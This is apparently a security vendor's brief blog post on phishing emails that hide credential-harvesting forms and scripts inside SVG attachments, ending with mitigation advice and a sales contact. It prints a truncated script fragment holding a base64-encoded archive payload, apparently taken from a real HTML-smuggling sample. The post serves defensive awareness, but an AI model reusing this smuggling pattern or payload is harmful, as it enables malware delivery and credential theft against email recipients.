Phishing emails increasingly use SVG attachments HTML smuggling to evade detection

2 months ago
sorb
2 minutes

Cybercriminals are increasingly leveraging Scalable Vector Graphics (SVG) attachments in phishing emails to bypass detection mechanisms. Unlike traditional image formats like JPG or PNG, which consist of pixel grids, SVG files use XML-based text to define images through lines, shapes, and text. This text-based structure allows SVG files to incorporate HTML elements and execute JavaScript, enabling attackers to embed phishing forms or malicious scripts directly within the image file.

<script type="application/ecmascript">
<![CDATA[
const base64Data = 'data:application/java-archive;base64,UEsDBAoAAAAAAKejJVoAAAAAAAAAAAAAAAATAAAAU3dpZnQgVHJhbnNhY3Rpb25zL1BLAwQUAAAACABXoyVaaJCt/jJgAQA
4GgUALgAAAFN3aWZ0IFRyYW5zYWN0aW9ucy9Td2lmdCBUcmFuc2FjdGlvbiBSZXBvcnQuanNcvdfSs8qyJfoqfTf7hE7sD5C/2BfCCiRAeEF3xAkJZDDyBtPz4ZvMAsQ6HbE6tub/CRVVWWlHjjx+ruE7vl3/x/9HFWOKGf7P/+f/fHdP+MSMRlPm8N//65/HN78uksvIiv75f/85jGf0O93Snl1/0E9ePKP0/MXWH+RS5empQhej+sN2eaK0OJxsq/qDaZ3yA3/OVlb9ISyLJLy450iqP8xLlREzmXOG9QeX0xJlv61YeICWuuGBN5jtsv5w82+m6nCrCP5MXZ5FowrYtVh/YEdq4lMrK33VH06UWoaT5gGTw8CI+A/9TesPXiWXuku9cDnn

For instance, an SVG file can be crafted to display a seemingly legitimate login form that, when interacted with, captures user credentials for malicious purposes. The versatility of SVGs in rendering complex graphics and executing scripts makes them an attractive tool for threat actors aiming to evade traditional email security filters, which may not scrutinize SVG files as rigorously as other attachment types.

To mitigate the risks associated with SVG-based phishing attacks, it is crucial to implement robust email filtering systems capable of analyzing the content of SVG files for malicious code. Additionally, educating users about the potential dangers of unexpected email attachments and encouraging cautious behavior when encountering unfamiliar file types can help reduce the likelihood of successful phishing attempts.

Sorb Security is capable of defending such attack. Please reach out to sales@sorbsecurity.com for a PoV.